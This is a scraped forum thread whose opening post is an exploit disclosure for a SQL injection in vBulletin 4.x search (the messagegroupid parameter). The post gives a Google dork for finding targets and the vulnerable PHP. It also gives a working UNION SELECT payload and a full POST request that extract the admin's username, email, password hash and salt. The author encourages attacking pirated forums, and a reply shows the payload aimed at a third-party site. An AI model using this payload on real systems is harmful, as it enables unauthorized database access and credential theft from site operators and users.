Page 1 of 4 123 ... LastLast
Results 1 to 10 of 36

Thread: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day Share/Save - My123World.Com!

  1. #1
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32

    Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day

    # Exploit Title: Vbulletin 4.0.x => 4.1.3 (messagegroupid) SQL injection Vulnerability 0-day
    # Google Dork: intitle: powered by Vbulletin 4
    # Date: 20/07/2011
    # Author: FB1H2S
    # Software Link: [http://www.vbulletin.com/]
    # Version: [4.x.x]
    # Tested on: [relevant os]
    # CVE : [http://members.vbulletin.com/]

    ################################################## ###
    Vulnerability:
    #################################################

    Vbulletin 4.x.x => 4.1.3 suffers from an SQL injection Vulnerability in parameter "&messagegroupid" due to improper input validation.

    ################################################## ###
    Vulnerable Code:
    ################################################## ###

    File: /vbforum/search/type/socialgroupmessage.php
    Line No: 388
    Paramater : messagegroupid


    Code:
    		
    		if ($registry->GPC_exists['messagegroupid'] AND count($registry->GPC['messagegroupid']) > 0)
    
    		{
    
    			$value = $registry->GPC['messagegroupid'];
    
    			if (!is_array($value))
    
    			{
    
    				$value = array($value);
    
    			}
    
    
    
    			if (!(in_array(' ',$value) OR in_array('',$value)))
    
    			{
    
    				if ($rst = $vbulletin->db->query_read("
    
    					SELECT socialgroup.name
    
    					FROM " . TABLE_PREFIX."socialgroup AS socialgroup
    
    --->					WHERE socialgroup.groupid IN (" . implode(', ', $value) .")")
    
    				
    			}

    ################################################## ###
    Exploitation:
    ################################################## ###
    Post data on: -->search.php?search_type=1
    --> Search Single Content Type

    Keywords : Valid Group Message

    Search Type : Group Messages

    Search in Group : Valid Group Id

    &messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt ) FROM user WHERE userid=1#

    ################################################## #########################################
    Note:
    ################################################## ###

    Funny part was that, a similar bug was found in the same module, search query two months back. Any way Vbulletin has released a patch as this one was reported to them by altex, hence customers are safe except lowsy admins. And this bug is for people to play with the many Nulled VB sites out there. " Say No to Piracy Disclosure ".

    ################################################## ###
    More Details:
    ################################################## ###

    Exact Request as follows:

    Code:
    query=Cross+Domain+Content+Extraction+attacks&titleonly=0&searchuser=&starteronly=0&searchdate=0&beforeafter=after&sortby=dateline&order=descending&showposts=1&saveprefs=1&dosearch=Search+Now&s=&securitytoken=1311201469-a9ee9dd6adccba0f8758fce3f02b7e0a267eea75&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#
    Hacking Is a Matter of Time Knowledge and Patience

  2. #2
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    Technically this is not a 0-day,but this would be the first public bug release .
    Hacking Is a Matter of Time Knowledge and Patience

  3. #3
    Infosec Enthusiast AnArKI's Avatar
    Join Date
    Jul 2010
    Location
    London
    Posts
    514
    Blog Entries
    2
    lol....where did u test it ???

  4. #4
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    @anarki well almost majority of the Admins out there are lazy people , they should learn form you patch management .
    Hacking Is a Matter of Time Knowledge and Patience

  5. #5
    hi tnx for this bug

    I tried to attack but I was unsuccessful , I do not know why , maybe I just did not notice ,

    my target :
    Code:
    http://www.x.net/search.php?search_type=1#ads=5&messagegroupid[0]=3 ) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

  6. #6
    offtopic
    fb1h2s, what does " Say No to Piracy Disclosure ". mean?

  7. #7
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    That's a poetic saying in authors description ," it says people go out and shell all pirated VB forums". Say no to piracy campaign lol .
    Hacking Is a Matter of Time Knowledge and Patience

  8. #8
    Security Researcher fb1h2s's Avatar
    Join Date
    Jul 2010
    Location
    India
    Posts
    616
    Blog Entries
    32
    @sheller the bug is in Post method its very similar to the previous Vbuletin bug/exploit.
    And I believe you are trying this out with prior permissions whom so ever it may concern.
    Hacking Is a Matter of Time Knowledge and Patience

  9. #9
    Quote Originally Posted by fb1h2s View Post
    @sheller the bug is in Post method its very similar to the previous Vbuletin bug/exploit.
    And I believe you are trying this out with prior permissions whom so ever it may concern.
    can you make a vidoe tut ?

  10. #10
    I tried testing this, and get an error. It seems that this is because a second query is also executed using the messagegroupid paramater before being returned. I did find a working exploit on packetstorm, but i am still trying to understand it 100% and turn it into a working python exploit :>

    http://0x6a616d6573.blogspot.com/201...tion-take.html

Tags for this Thread

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •